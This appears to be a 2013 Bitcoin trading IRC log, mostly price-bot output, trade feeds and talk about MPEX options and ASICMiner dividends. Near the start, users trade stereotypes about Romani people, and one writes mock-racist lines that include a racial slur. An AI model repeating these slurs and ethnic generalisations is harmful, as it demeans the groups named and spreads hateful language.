lol Mar 27 16:21:40 ;;bids 82 Mar 27 16:21:40 There are currently 6359.1076 bitcoins demanded at or over 82.0 USD, worth 536315.344566 USD in total. | Data vintage: 34.9539 seconds Mar 27 16:22:09 ;;bids 0 Mar 27 16:22:09 There are currently 36661582 bitcoins demanded at or over 0.0 USD, worth 9860755.86811 USD in total. | Data vintage: 64.1093 seconds Mar 27 16:22:15 nah. they said the same about slovakian gypsies Mar 27 16:22:19 10mil soon Mar 27 16:22:22 and many indeed went to UK Mar 27 16:22:37 but mostly they found a work there and are happy Mar 27 16:22:46 no significant crime there Mar 27 16:23:00 if rally continues tomorrow... Mar 27 16:23:06 ;;asks 100 Mar 27 16:23:07 You don't know romanian gypsies. Mar 27 16:23:09 There are currently 22997.679 bitcoins offered at or under 100.0 USD, worth 2160753.28198 USD in total. | Data vintage: 0.0024 seconds Mar 27 16:23:12 no janitorial, babysitting, etc. Mar 27 16:23:36 tiberiusiv don't be racist. they will work given the opprotunity Mar 27 16:24:04 but in eastern yourp there's longtime econ crunch, few opportunities Mar 27 16:24:58 patently false. when there was less than 12% unemployment here politicians celebrated Mar 27 16:25:03 [BTCTC] [RSM] 250 @ 0.004 = 1 BTC [+] Mar 27 16:25:04 and it's over 20% atm Mar 27 16:25:11 wife had a ligher, thank fuck lol Mar 27 16:25:56 Romania Unemployment rate: 4.3% Mar 27 16:26:18 usa is 8 or 9 percent? Mar 27 16:26:26 and that's impossible in spain? Mar 27 16:26:27 You are welcome to come here if you are jobless. Mar 27 16:26:48 yeah usa is abou 9% employed Mar 27 16:27:17 http://www.google.ca/publicdata/explore?ds=z8o7pt6rd5uqa6_&met_y=unemployment_rate&idim=country:ro&fdim_y=seasonality:sa&dl=en&hl=en&q=romania%20unemployment Mar 27 16:27:19 before 2009 there was less than 10% in spain. here never since revolution. Mar 27 16:27:49 well Mar 27 16:28:11 the problem with unemployment is it doesnt include the people who became disabled just so they could survive Mar 27 16:28:22 tiberiusiv we have quite generous support payment for few months. so they mus have some accurate accounting Mar 27 16:28:38 otherwise ppl will riot when they;d receive nothing Mar 27 16:28:46 jurov: riot in the US? unlikely Mar 27 16:29:03 otherwise we would have rioted in 2000 when congress refused a recount Mar 27 16:29:04 as opposed to me. ic. Mar 27 16:29:37 and then in 2004 when bush was re-elected after putting our nation into extreme debt, destroyed education, destroying social security, and destroying our medical infrascruture Mar 27 16:29:56 anyway... these are the gypsies you tell as "don't know what the work mean" Mar 27 16:30:11 oh christ not the gypsy shit again Mar 27 16:30:15 they often pick up work we despise Mar 27 16:30:17 NO ONE CARES JUROV Mar 27 16:30:32 tiberiusiv cares Mar 27 16:30:35 Diablo-D3: you obviously don't care Mar 27 16:30:42 tiberiusiv is a troll Mar 27 16:30:44 he doesnt count Mar 27 16:30:58 but i have few friends with darker skin and know how hard it's for them Mar 27 16:31:00 [HAVELOCK] [SDICE] 5 @ 0.46500025 = 2.325 BTC [-] Mar 27 16:31:12 when ppl tel "they will steal" on sight Mar 27 16:31:28 jurov: dude Mar 27 16:31:32 thats what allll white people say Mar 27 16:31:37 go to the deep south in the US Mar 27 16:31:53 DEM DARE DARKIES, THEY'YA STEAL YA BLIND Mar 27 16:32:01 related to the bitcoin DDOSes? http://www.telegraph.co.uk/technology/internet-security/9957063/Web-slows-under-biggest-attack-ever.html Mar 27 16:32:14 MAH GRAMPY'S GRAMPY WAS IN THE WAR YA KNOW Mar 27 16:32:18 "which war?" Mar 27 16:32:26 THE CIVIL WAR, AND THE NIGGAHS WON DAT Mar 27 16:32:32 WORST DAY IN HISTORY Mar 27 16:32:56 and now why do you think that is? Mar 27 16:33:05 because white people are the most racist fucks on the planet Mar 27 16:33:13 and I say that as a white guy Mar 27 16:33:17 whos half german. Mar 27 16:33:24 asians are more racists than whites Mar 27 16:33:40 Chaang-Noi: dude, we killed white people because they wernt white enough Mar 27 16:33:41 my experiences have shown me it goes both ways diablo Mar 27 16:33:50 experiences may differ of course Mar 27 16:34:06 d3 learn asian history and culter, trust me on this Mar 27 16:34:14 jewish? nope, not white, even though you're 100% genetically german Mar 27 16:34:21 gay? nope, white people arent gay Mar 27 16:34:28 ok now tiberiusiv has earned the ignore Mar 27 16:34:43 disabled? nope, white people can automatically grow new limbs, srsly Mar 27 16:34:46 take your rants somewhere else you fuckhead Mar 27 16:34:48 tiberslav getting trolled and asking people to shut up, hahahah Mar 27 16:35:01 I'm done Mar 27 16:35:10 hitler is too jewish for my tasts Mar 27 16:35:35 and then we get to the big leagues over in soviet russia Mar 27 16:35:48 they killed everyone who couldnt grow a stalin-esque power mustache Mar 27 16:36:34 even russian women can grow them Mar 27 16:36:56 they use it to scare off wolves and potential suitors Mar 27 16:38:14 The euro extended losses following media reports that Pier Luigi Bersani, the head of Italy’s center-left alliance, ruled out forming a coalition government, saying that only an “insane person” would want to govern Italy. Mar 27 16:38:31 lol Mar 27 16:38:38 russian women scare wolves with mustache??? i thought they use the perfume Mar 27 16:38:55 jurov: no, thats to scare Putin away Mar 27 16:40:13 speaking of italy, tiberiusiv was a roman emperor Mar 27 16:40:29 tiberius is also kirk's middle name Mar 27 16:42:34 hell i bought at 3.5 40 stable is awesome Mar 27 16:43:22 taht willleave you with .2 btc? Mar 27 16:45:29 ;;asks 87.5 Mar 27 16:45:30 There are currently 1391.9833 bitcoins offered at or under 87.5 USD, worth 121250.751869 USD in total. | Data vintage: 68.8257 seconds Mar 27 16:45:45 ;;asks 87 Mar 27 16:45:45 There are currently 827.90834 bitcoins offered at or under 87.0 USD, worth 72027.1649475 USD in total. | Data vintage: 83.9231 seconds Mar 27 16:46:01 wtf? Mar 27 16:46:08 the bot slow? Mar 27 16:46:18 ;;asks 87 Mar 27 16:46:18 There are currently 827.90834 bitcoins offered at or under 87.0 USD, worth 72027.1649475 USD in total. | Data vintage: 116.9298 seconds Mar 27 16:47:10 ;;asks 87 Mar 27 16:47:12 There are currently 0 bitcoins offered at or under 87.0 USD, worth 0.0 USD in total. | Data vintage: 0.0015 seconds Mar 27 16:47:18 ;;asks 87.5 Mar 27 16:47:18 There are currently 228.73736 bitcoins offered at or under 87.5 USD, worth 20009.1910906 USD in total. | Data vintage: 6.7427 seconds Mar 27 16:47:24 ;;asks 88 Mar 27 16:47:25 There are currently 1430.3342 bitcoins offered at or under 88.0 USD, worth 125629.001767 USD in total. | Data vintage: 13.4077 seconds Mar 27 16:47:31 there we go Mar 27 16:48:18 tiberiusiv: So how does the SP500's 4% growth for march corrolate to BTC's 145$? (roughly) Mar 27 16:48:26 145% Mar 27 16:48:53 some of wall street invested in btc :) Mar 27 16:49:46 lol Mar 27 16:50:02 you must be a billionaire cuz you know so much Mar 27 16:50:25 wouldn't it be great to have a tradeable volatility index? Mar 27 16:51:04 ok - I just missed the 'smaller less liquid' piece - we don't need to go through the whole thing again. Mar 27 16:52:49 if the sp500 goes down 20% btc will lose more than 100% of value right? Mar 27 16:53:05 sure? Mar 27 16:53:35 so a 41% and btc loses more than 100% right? Mar 27 16:53:49 I would say that is a 'loose' correlation at best. Mar 27 16:54:04 tiberslav thinks im thai Mar 27 16:55:00 tiberslav tiberslav the expert with .35 btc Mar 27 16:56:25 [BTCTC] [S.DICE-PT] 50 @ 0.00442 = 0.221 BTC [+] Mar 27 16:57:01 [HAVELOCK] [HIM] 1 @ 1.85 BTC [+] Mar 27 16:57:54 i guess the OIX has some similarity to the VIX or VXX...but i don't think it does the implied variance Mar 27 16:58:01 [HAVELOCK] [HIM] 1 @ 1.8 BTC [-] Mar 27 16:58:33 tiberiusiv: what does that make what you're doing? Mar 27 16:58:59 !last h vtx Mar 27 16:59:00 Last trade for VTX on HAVELOCK was at 0.532 BTC [-] Mar 27 17:00:39 I think it's crazy the fork didn't have a bigger impact. I still don't understand it. Mar 27 17:02:19 tiperissuv what is your day job? or you a welfare kinda guy? Mar 27 17:02:35 i'd like to know the amount of -wallets- in existence rather than addresses to better gauge adoption Mar 27 17:02:51 there is a chart for that, i dont have link ready :( Mar 27 17:02:56 [BTCTC] [B.YABMC] 1 @ 0.009901 BTC [-] Mar 27 17:03:01 [HAVELOCK] [VTX] 5 @ 0.565 = 2.825 BTC [+] Mar 27 17:03:05 used to show by country too Mar 27 17:03:15 tiberiusiv: how can you assess that Mar 27 17:03:20 ;;asks 88 Mar 27 17:03:23 There are currently 1443.1185 bitcoins offered at or under 88.0 USD, worth 126757.23828 USD in total. | Data vintage: 0.0015 seconds Mar 27 17:03:31 ;;asks 87.71 Mar 27 17:03:32 There are currently 488.05041 bitcoins offered at or under 87.71 USD, worth 42758.3837702 USD in total. | Data vintage: 8.3323 seconds Mar 27 17:04:03 lol Mar 27 17:04:29 in real world 10% control 90% Mar 27 17:04:31 tiberiusiv: are you familar with s-curve new tech. adoption rates? Mar 27 17:04:46 facepalm Mar 27 17:05:13 lucky bastard Mar 27 17:05:22 still better than fiat money! Mar 27 17:05:34 tiberiusiv: http://smart-future.org/wp-content/uploads/2009/10/S-Curve1_261009.jpg Mar 27 17:05:35 tiberiusiv : link ? Mar 27 17:05:51 [BTCTC] [ASICMINER-PT] 1 @ 0.7051 BTC [-] Mar 27 17:05:52 seems to big Mar 27 17:05:54 [BTCTC] [ASICMINER-PT] 1 @ 0.7051 BTC [-] Mar 27 17:05:56 i'd expect one of those in terms of -BTC adoption-, not price Mar 27 17:06:01 Mar 27 17:07:05 that's why freicoin sounds like a better idea, but who's going to want that? nobody... Mar 27 17:07:09 how's that different from any other currency Mar 27 17:07:12 ;;asks 89.84 Mar 27 17:07:13 There are currently 3551.0734 bitcoins offered at or under 89.84 USD, worth 314914.120344 USD in total. | Data vintage: 23.6477 seconds Mar 27 17:07:46 ;;bc,vwap Mar 27 17:07:46 Error: "bc,vwap" is not a valid command. Mar 27 17:07:52 ;;vwap Mar 27 17:07:52 Error: "vwap" is not a valid command. Mar 27 17:07:59 is there a comman d for that? Mar 27 17:08:09 I just want a coin that's "fair". Mar 27 17:08:11 ;;24hrprc Mar 27 17:08:11 Error: "24hrprc" is not a valid command. Mar 27 17:08:15 life is not fair Mar 27 17:08:24 why btc should be fair ? Mar 27 17:08:32 saulimus: lol my friend was just saying that freicoins were cooler Mar 27 17:08:42 ;;asks 87.71 Mar 27 17:08:43 There are currently 242.79055 bitcoins offered at or under 87.71 USD, worth 21288.6741198 USD in total. | Data vintage: 113.9707 seconds Mar 27 17:08:47 no, but it's better for some things to be fair than none at all Mar 27 17:08:49 i said...on their website they say that people will want to hoard and will move to gold or bitcoins Mar 27 17:09:14 the only times demurrage has really worked was with fiat and govt control Mar 27 17:09:36 ;;ticker Mar 27 17:09:37 BTCUSD ticker | Best bid: 87.60100, Best ask: 87.64000, Bid-ask spread: 0.03900, Last trade: 87.64000, 24 hour volume: 74410.88664766, 24 hour low: 75.20000, 24 hour high: 87.70000, 24 hour vwap: 81.34377 Mar 27 17:09:38 you can't force people to adopt a currency they have to spend, so it is an interesting thought experiment, but will never succeed Mar 27 17:10:13 can't wait before a early dump 100K just for fun Mar 27 17:11:01 [HAVELOCK] [VTX] 1 @ 0.593 BTC [+] Mar 27 17:11:25 we are about to rocket? Mar 27 17:11:43 ;;goxlag Mar 27 17:11:44 0.026871 seconds Mar 27 17:11:45 ;;bids 0 Mar 27 17:11:48 There are currently 36662286 bitcoins demanded at or over 0.0 USD, worth 9836023.47991 USD in total. | Data vintage: 0.0190 seconds Mar 27 17:12:18 what is the command to see the impact for a 10k dump Mar 27 17:12:51 tiberiusiv, a bitcoin that doesn't reward early adopters in a huge way. just like you said, the wealth distribution is a lot worse than in fiat. Mar 27 17:13:14 risk is relative Mar 27 17:13:17 who cares about wealth distribution Mar 27 17:13:17 lol more risk ? Mar 27 17:13:26 50K BTC was like 50$ Mar 27 17:13:29 rich people spend money Mar 27 17:13:31 why do you guys take tib seriously? Mar 27 17:13:33 NEW ATH!!!!!!!! Mar 27 17:13:34 wich risk ? :D Mar 27 17:13:38 it litters mt chat log Mar 27 17:13:40 my Mar 27 17:13:42 ThickAsThieves: i muted him, so i am only seeing one side of the convo Mar 27 17:13:48 it's derivative trolling now Mar 27 17:14:13 tiberslav is a fun troll we will get tired of in a day or so and all have him on igniore Mar 27 17:14:24 yeah true Mar 27 17:14:25 ok Mar 27 17:14:32 he sounds a bit bitter and angry Mar 27 17:14:34 can't wait Mar 27 17:14:56 ;;asks 80 Mar 27 17:14:59 There are currently 0 bitcoins offered at or under 80.0 USD, worth 0.0 USD in total. | Data vintage: 0.0013 seconds Mar 27 17:15:00 ;;asks 88 Mar 27 17:15:01 There are currently 943.5047 bitcoins offered at or under 88.0 USD, worth 82991.945217 USD in total. | Data vintage: 2.2569 seconds Mar 27 17:15:09 he does sound bitter and angry...some people will take any attention, even negative (see: lindsay lohan) Mar 27 17:15:09 ;;bc,stats Mar 27 17:15:11 yes but some early will want cash out at certain point Mar 27 17:15:12 Current Blocks: 228258 | Current Difficulty: 6695826.282596251 | Next Difficulty At Block: 229823 | Next Difficulty In: 1565 blocks | Next Difficulty In About: 1 week, 4 days, 6 hours, 12 minutes, and 56 seconds | Next Difficulty Estimate: 6736564.18643 | Estimated Percent Change: 0.60841 Mar 27 17:15:23 ;;nethash Mar 27 17:15:27 49661.7113479 Mar 27 17:15:32 booo Mar 27 17:15:33 i don't know about you, but it appears that $100 is pretty much certain in the next month Mar 27 17:15:40 ? Mar 27 17:15:45 next monday Mar 27 17:15:51 so if most people see $100 coming...i think they would wait till around then, high 90's etc Mar 27 17:16:04 then we get a little pullback Mar 27 17:16:15 thing is, no one is cashing out, or if the did, it was at 30 Mar 27 17:16:20 all bears are long dead Mar 27 17:16:21 and more people jump in to push us past that level, my projection at least Mar 27 17:16:25 ;;market sell 10000 Mar 27 17:16:26 A market order to sell 10000 bitcoins right now would net 837740.3477 USD and would take the last price down to 81.0000 USD, resulting in an average price of 83.7740 USD/BTC. | Data vintage: 86.3440 seconds Mar 27 17:16:29 error4733: ^ Mar 27 17:16:31 $100 could happen this week, shit's getting hot Mar 27 17:16:37 sure is Mar 27 17:16:44 lol S.dice value is 37M$ today Mar 27 17:16:48 i will sell some at $1000 Mar 27 17:16:56 i might sell one or two Mar 27 17:18:04 ;;asks 88 Mar 27 17:18:06 so tib what you say is, we play with 1M BTC because 9M is blocked in healty address and stay there ? Mar 27 17:18:07 There are currently 729.12237 bitcoins offered at or under 88.0 USD, worth 64148.2153717 USD in total. | Data vintage: 0.0013 seconds Mar 27 17:18:39 look good for me ! that me my BTC is 10 time more valuable Mar 27 17:19:06 *that mean Mar 27 17:19:52 error4733: 10X more able to move the market at least...it's similar to S.DICE's situation Mar 27 17:19:58 wonder if 95 will break by the time i wake up tomorrow Mar 27 17:20:18 lol, try selling all google or apple stock in the world at once Mar 27 17:20:41 Chaang-Noi: some one is always on the other side of the trade Mar 27 17:20:50 so someone is buying all the appl or goog in the world Mar 27 17:21:06 there are more google shares than bids Mar 27 17:21:09 this is normal Mar 27 17:21:14 ;;ticker Mar 27 17:21:16 BTCUSD ticker | Best bid: 87.90501, Best ask: 87.96700, Bid-ask spread: 0.06199, Last trade: 87.96700, 24 hour volume: 74596.54084966, 24 hour low: 75.20000, 24 hour high: 87.96700, 24 hour vwap: 81.52881 Mar 27 17:21:22 tiberslav you have no valied point... just stfu lol Mar 27 17:21:30 87.98 Mar 27 17:22:11 ;;goxlag Mar 27 17:22:11 69.445847 seconds Mar 27 17:22:12 he's never had one Mar 27 17:22:12 [BTCTC] [ASICMINER-PT] 7 @ 0.7051 = 4.9357 BTC [-] Mar 27 17:22:35 its basically (your position) ^ -1 Mar 27 17:22:58 [BTCTC] [ASICMINER-PT] 29 @ 0.715 = 20.735 BTC [+] Mar 27 17:23:10 87.99 Mar 27 17:23:22 88 Mar 27 17:23:30 ;;asks 88 Mar 27 17:23:32 There are currently 416.45479 bitcoins offered at or under 88.0 USD, worth 36647.2587645 USD in total. | Data vintage: 0.0013 seconds Mar 27 17:23:40 [BTCTC] [ASICMINER-PT] 10 @ 0.745 = 7.45 BTC [+] Mar 27 17:23:49 http://www.youtube.com/watch?v=JFT7hNhop7w Mar 27 17:24:17 [BTCTC] [ASICMINER-PT] 1 @ 0.7489 BTC [+] Mar 27 17:24:46 what you said to the negative first power Mar 27 17:25:16 oh gox, why you haz so much lag Mar 27 17:25:25 [BTCTC] [ASICMINER-PT] 4 @ 0.74899 = 2.996 BTC [+] Mar 27 17:25:50 thestrin1puller: the ;;seen me's are starting to get confusing. Do you use it as some kind of market indicator? ;D Mar 27 17:27:22 http://blog.smickles.com/2013/03/27/mpex-might-have-a-significant-effect-on-the-market/ Mar 27 17:27:24 i wonder, should i really buy a boat? or get a real boat? hmmmm Mar 27 17:28:23 over 88 Mar 27 17:28:25 really buy a boat or buy a real boat? Mar 27 17:28:39 a real boat Mar 27 17:28:42 i live near the ocean Mar 27 17:29:00 ;;asks 88.20 Mar 27 17:29:02 There are currently 99.482627 bitcoins offered at or under 88.2 USD, worth 8774.26253061 USD in total. | Data vintage: 11.1237 seconds Mar 27 17:29:03 thestrin1puller: np, want to provide me a better link for you? Mar 27 17:29:07 er Mar 27 17:29:10 tiberiusiv: %^^ Mar 27 17:29:26 asicminer div tiem Mar 27 17:29:30 smickles this will surely go to tib's head Mar 27 17:29:36 d3 did they pay? Mar 27 17:29:47 Chaang-Noi: yeah, this is the 5th dividend this month Mar 27 17:29:49 toll power +10 Mar 27 17:29:58 troll power +10* Mar 27 17:29:59 awesome what was it? Mar 27 17:30:12 Chaang-Noi: oh, dunno, got the pre-dividend tx so far Mar 27 17:30:22 oh, i did not :/ Mar 27 17:32:38 tiberslav is gone :/ Mar 27 17:33:11 he's been gone for a while, thanks to /ignore Mar 27 17:33:23 :) Mar 27 17:34:01 i unignore him sometimes just to take his pulse again, but it plagues my screen, so i usually re ingore Mar 27 17:34:09 [BTCTC] [BTC-TRADING-PT] 1 @ 0.129 BTC [-] Mar 27 17:34:15 [BTCTC] [BTC-TRADING-PT] 7 @ 0.129 = 0.903 BTC [-] Mar 27 17:34:21 i thought it a little funny, pointing out tiberiusiv's accusation agains mircea_popescu with links to their -otc ratings Mar 27 17:35:08 d3 you got test payment? Mar 27 17:35:20 Chang-Noi: 95 is in reach on CAD market: http://bitcoincharts.com/markets/virtexCAD.html Mar 27 17:35:33 ;D Mar 27 17:35:48 Someone should tell that waller that if he just moves it to $190, everyone will follow him at this point. Mar 27 17:35:54 ;;ticker Mar 27 17:35:55 BTCUSD ticker | Best bid: 87.60000, Best ask: 88.00000, Bid-ask spread: 0.40000, Last trade: 88.00000, 24 hour volume: 72723.62126118, 24 hour low: 75.60000, 24 hour high: 88.24300, 24 hour vwap: 81.94089 Mar 27 17:36:06 unbalanced: he knows Mar 27 17:36:11 i'd wager Mar 27 17:36:18 Dood yer freakin me out. Mar 27 17:36:23 d3 okay got mine to, but now shoing up on client, but in block chain info Mar 27 17:36:37 I'm afraid of whales. Mar 27 17:36:58 What did someone say above? whalebears? Mar 27 17:37:51 http://www.reddit.com/r/Bitcoin/comments/1b432x/mpex_might_have_a_significant_effect_on_the_market/ << if you want to show it some love on reddit Mar 27 17:38:35 i think ive been to reddit like twice ever Mar 27 17:38:39 am i missing out? Mar 27 17:38:44 not really Mar 27 17:38:55 it's hard to filter the crud Mar 27 17:39:19 i read some of the obama posts and thats about uit Mar 27 17:39:21 hehe Mar 27 17:39:45 ThickAsThieves: it's mostly just another way to share links Mar 27 17:40:18 probly better than my facebook feed at least Mar 27 17:44:43 heh, there is probably a little more input than your facebook feed gets Mar 27 17:45:49 upvoted Mar 27 17:46:32 but you think first comment will be WTF? ELI5 Mar 27 17:46:43 derp.. *I think Mar 27 17:46:47 [BTCTC] [SYNERGY] 1 @ 0.0157 BTC [+] Mar 27 17:47:43 jurov: heh, maybe there's a market for eli5 mpex Mar 27 17:48:19 [BTCTC] [SYNERGY] 1 @ 0.015707 BTC [+] Mar 27 17:48:30 that would be best done as redirect straight to satoshi dice Mar 27 17:50:04 [MPEX] [S.DICE] 3400 @ 0.00418223 = 14.2196 BTC [+] Mar 27 17:50:06 [MPEX] [S.DICE] 600 @ 0.00415002 = 2.49 BTC [-] Mar 27 17:54:02 Chaang-Noi: for 1371 shares, 5.175525 Mar 27 17:54:21 not a lot eh? Mar 27 17:54:34 and remember, they just paid one for 10.x 3 days ago Mar 27 17:54:37 ;;ticker Mar 27 17:54:37 BTCUSD ticker | Best bid: 88.24301, Best ask: 88.48700, Bid-ask spread: 0.24399, Last trade: 88.24301, 24 hour volume: 71375.87196489, 24 hour low: 76.80000, 24 hour high: 88.48700, 24 hour vwap: 82.17944 Mar 27 17:54:45 yeah Mar 27 17:55:15 0.003775 each Mar 27 17:55:33 and this is like for 72 hours? Mar 27 17:55:56 if so a week would be .008 Mar 27 17:56:07 AM div is in i think Mar 27 17:56:08 0.003775 Mar 27 17:56:13 still well over 1% per week Mar 27 17:56:39 AM is undervalued :/ Mar 27 17:57:02 I know, right? Mar 27 17:57:03 i agree Mar 27 17:57:34 what was the previous payoff div? Mar 27 17:58:14 dont know but that was just paying the 163k Mar 27 17:58:27 i wanted to know what it was with the 400k and that is still over 1% a week right now, awesome Mar 27 17:58:51 if you take half of the payoff div Mar 27 17:58:57 and add it to this one Mar 27 17:59:02 it's 0.00752923 for the week Mar 27 17:59:13 probly closer to what next week's will look like Mar 27 18:00:57 i dont think so Mar 27 18:01:15 oh Mar 27 18:01:17 ok Mar 27 18:01:17 sorry Mar 27 18:01:20 yeah close to that Mar 27 18:01:46 okay so .0075 is 1% of current trading value Mar 27 18:01:49 still pretty awesome Mar 27 18:01:58 esp with bfl fail and maybe 60 ghs soon Mar 27 18:02:03 yep Mar 27 18:02:05 i agree Mar 27 18:02:22 i'd still feel better of share price went back to .9 though :) Mar 27 18:02:26 if* Mar 27 18:02:40 if the 60 ghs comes on line it will be well over 2btc Mar 27 18:03:32 "First week's normal dividends paid. The balance payment of the next batch, as well as the premium for a full-mask to guarantee our quantity production (200 TH/s or more, depending on how well BTC/USD could do) within the next three months, are partly taken from this week's revenue and the next week's. So the dividends within these two weeks are lower than normal." Mar 27 18:03:36 Friedcat Mar 27 18:04:12 so this next week could be a great time for buying Mar 27 18:04:33 i heart friedcat Mar 27 18:05:16 all my sell orders are now gone lol Mar 27 18:06:02 yep Mar 27 18:06:04 ;) Mar 27 18:06:16 same at 1.3 left Mar 27 18:07:03 hmm Mar 27 18:07:09 maybe I won't short asicminer Mar 27 18:07:17 thank god for bitcoin-assets Mar 27 18:07:29 otherwise I would be a btcloser Mar 27 18:07:34 btc loser Mar 27 18:07:46 MP hates AM lol Mar 27 18:08:03 200 TH is going to rape everything Mar 27 18:09:06 my calls are raping everything right now Mar 27 18:09:11 hehe Mar 27 18:09:19 i only have a few Mar 27 18:09:24 but i'm quite happy with them Mar 27 18:09:28 $6000 profit each dollar rise in btc price Mar 27 18:11:18 Bugpowder: i read that as bt closer Mar 27 18:11:24 and i was like NICE, coffee is for closers Mar 27 18:12:02 88.7 Mar 27 18:12:06 yeah, i am seriously considering going long asicminer Mar 27 18:12:07 where we not just at 67.7 lol Mar 27 18:12:19 ;;bc,24hprc Mar 27 18:12:19 [BTCTC] [COGNITIVE] 7 @ 0.131 = 0.917 BTC [-] Mar 27 18:12:19 im long AM :) Mar 27 18:12:21 82.46 Mar 27 18:12:22 [BTCTC] [COGNITIVE] 3 @ 0.13 = 0.39 BTC [-] Mar 27 18:12:24 [BTCTC] [COGNITIVE] 2 @ 0.13 = 0.26 BTC [-] Mar 27 18:12:26 [BTCTC] [COGNITIVE] 7 @ 0.129 = 0.903 BTC [-] Mar 27 18:12:28 TIME TO BUY A NICE SET OF STEAKKNIVES Mar 27 18:12:29 [BTCTC] [COGNITIVE] 25 @ 0.1253 = 3.1325 BTC [-] Mar 27 18:13:24 [BTCTC] [COGNITIVE] 1 @ 0.1439 BTC [+] Mar 27 18:14:03 ;;bids 0 Mar 27 18:14:06 There are currently 36661713 bitcoins demanded at or over 0.0 USD, worth 9815526.0337 USD in total. | Data vintage: 0.0188 seconds Mar 27 18:14:38 [BTCTC] [ASICMINER-PT] 5 @ 0.73 = 3.65 BTC [-] Mar 27 18:15:21 [BTCTC] [ASICMINER-PT] 5 @ 0.73 = 3.65 BTC [-] Mar 27 18:15:51 you know, we might actually break 100 before friday Mar 27 18:15:57 at this pace Mar 27 18:16:03 we might Mar 27 18:16:12 CoinBr announcement about MPOE options renaming: https://www.bitcoinforum.com/coinbr-com/automatic-exercise/msg2703/#msg2703 Mar 27 18:16:21 in which case... those 750Ts would be profitable Mar 27 18:16:54 im not tgoing to risk it Mar 27 18:17:25 i'm selling them ;-) Mar 27 18:17:34 lol :) Mar 27 18:18:01 I guess 15:00 is when west coast US opens for biz Mar 27 18:18:10 lots of volume around that time Mar 27 18:19:26 ;;asks 88.7 Mar 27 18:19:26 There are currently 55.752531 bitcoins offered at or under 88.7 USD, worth 4945.2495272 USD in total. | Data vintage: 6.9561 seconds Mar 27 18:19:33 ;;asks 89 Mar 27 18:19:33 There are currently 926.48815 bitcoins offered at or under 89.0 USD, worth 82396.9086874 USD in total. | Data vintage: 13.9719 seconds Mar 27 18:19:37 ;;asks 90 Mar 27 18:19:38 There are currently 4351.9612 bitcoins offered at or under 90.0 USD, worth 389854.772436 USD in total. | Data vintage: 18.6086 seconds Mar 27 18:19:42 ;;asks 95 Mar 27 18:19:43 There are currently 10903.49 bitcoins offered at or under 95.0 USD, worth 997552.815755 USD in total. | Data vintage: 23.4400 seconds Mar 27 18:19:45 ;;asks 100 Mar 27 18:19:46 There are currently 20573.206 bitcoins offered at or under 100.0 USD, worth 1947966.64786 USD in total. | Data vintage: 26.6799 seconds Mar 27 18:20:38 so these c750 options. their original price is set by mpex. as the expiry approaches and BTCUSD goes up, the cost of one option increases? Mar 27 18:20:50 yea Mar 27 18:21:06 but if the price fluxes real fast that's when it's a good time to buy/sell and option Mar 27 18:21:27 so by now, C750T at .2499 would not really be profitable to buy, assuming VWAP stays up? Mar 27 18:21:55 C750 was good to buy yesterday when the price 24hprc was at ~69 but the current price was 75 Mar 27 18:22:01 wow the price went up that fast? Mar 27 18:22:06 it was a .101 Mar 27 18:22:12 that would have also been a good time to buy Mar 27 18:22:18 .2499 listed on coinbr Mar 27 18:22:22 a lot can happen by friday though Mar 27 18:22:23 the C750Ts are not being offered by mpoebot Mar 27 18:22:27 the bot is sold out of those Mar 27 18:22:27 thanks for the explanation. Mar 27 18:22:38 they are being offered by me, and one other unknown party Mar 27 18:22:43 LOL Mar 27 18:22:51 sellin calls mr. Powda Mar 27 18:23:12 I am willing to sell at a 100 break-even price model Mar 27 18:23:20 for all my holdings Mar 27 18:23:29 yeah, i would too lol Mar 27 18:23:39 :) I am willing to understand that, if I was so able. Mar 27 18:23:51 http://venturebeat.com/2013/03/27/bitcoin-expensify/ Mar 27 18:23:57 ;;tslb Mar 27 18:24:00 interesting how smooth the asks are up to 100 Mar 27 18:24:01 Time since last block: 47 minutes and 11 seconds Mar 27 18:24:06 this is why ltc Mar 27 18:24:11 I guess everyone is afraid of 100 Mar 27 18:24:18 ;;bc,stats Mar 27 18:24:19 and is putting asks a bit below Mar 27 18:24:22 Current Blocks: 228264 | Current Difficulty: 6695826.282596251 | Next Difficulty At Block: 229823 | Next Difficulty In: 1559 blocks | Next Difficulty In About: 1 week, 4 days, 3 hours, 15 minutes, and 25 seconds | Next Difficulty Estimate: 6745408.56422 | Estimated Percent Change: 0.7405 Mar 27 18:24:38 lmao... some chips blew Mar 27 18:24:39 So, the Optoins offered should change after friday, right Mar 27 18:24:40 ? Mar 27 18:24:56 http://trilema.com/2013/mpex-btc-usd-options-denomination-change/ Mar 27 18:25:03 ^ deadweasel Mar 27 18:25:06 There should be a C800T, C800N, C8500T, C8500N, etc. Mar 27 18:25:09 oh, thx Mar 27 18:25:54 tl,dr: It’s the intention to offer strikes from 20 to 200 at a step of 3 via the MPOE bot (so 20, 23, 26 etc). Mar 27 18:26:36 can people create their own strikes? Mar 27 18:26:46 I like the *all time high* thing on bitcoinity Mar 27 18:26:52 yeah Mar 27 18:26:57 andt he cartoons Mar 27 18:27:05 smickles: me too! but why bother taking it off...every tick is a NATH Mar 27 18:27:11 so the bot will start listing, brokers buy, say jurov, and posts some on Coinbr? Mar 27 18:27:12 I've missed all the cartoon tho :| Mar 27 18:27:18 MJR_ you can on bitfunder Mar 27 18:27:22 i saw one and was like wtf! Mar 27 18:27:30 no i was wondering about MKOPT Mar 27 18:27:37 deadweasel wat? Mar 27 18:27:41 can you use that to make your own strike or will it be rejected Mar 27 18:28:00 MJR_: you'll be rejected Mar 27 18:28:06 you have to use existing MPSIC Mar 27 18:28:12 ah ok cool Mar 27 18:28:45 deadweasel: coinbr doesn't offer own options. what you see on New order should be the saem order book as on mpex Mar 27 18:28:50 smickles: sent you mail and a pm Mar 27 18:29:02 ;;asks 89] Mar 27 18:29:02 Error: Spurious "]". You may want to quote your arguments with double quotes in order to prevent extra brackets from being evaluated as nested commands. Mar 27 18:29:04 ;;asks 89 Mar 27 18:29:07 There are currently 817.2041 bitcoins offered at or under 89.0 USD, worth 72697.3513288 USD in total. | Data vintage: 0.0014 seconds Mar 27 18:29:07 except that there's some spurious caching added at ddos time, it seems. Mar 27 18:29:20 ahh i wanted to break 89 before bed :/ Mar 27 18:29:51 ;;ticker Mar 27 18:29:51 BTCUSD ticker | Best bid: 88.75001, Best ask: 88.75800, Bid-ask spread: 0.00799, Last trade: 88.75001, 24 hour volume: 69349.69370356, 24 hour low: 76.82000, 24 hour high: 88.80000, 24 hour vwap: 82.50051 Mar 27 18:29:56 .25 more Mar 27 18:29:57 ;;bids 80 Mar 27 18:29:57 !ticker h sdice Mar 27 18:29:57 There are currently 13120.794 bitcoins demanded at or 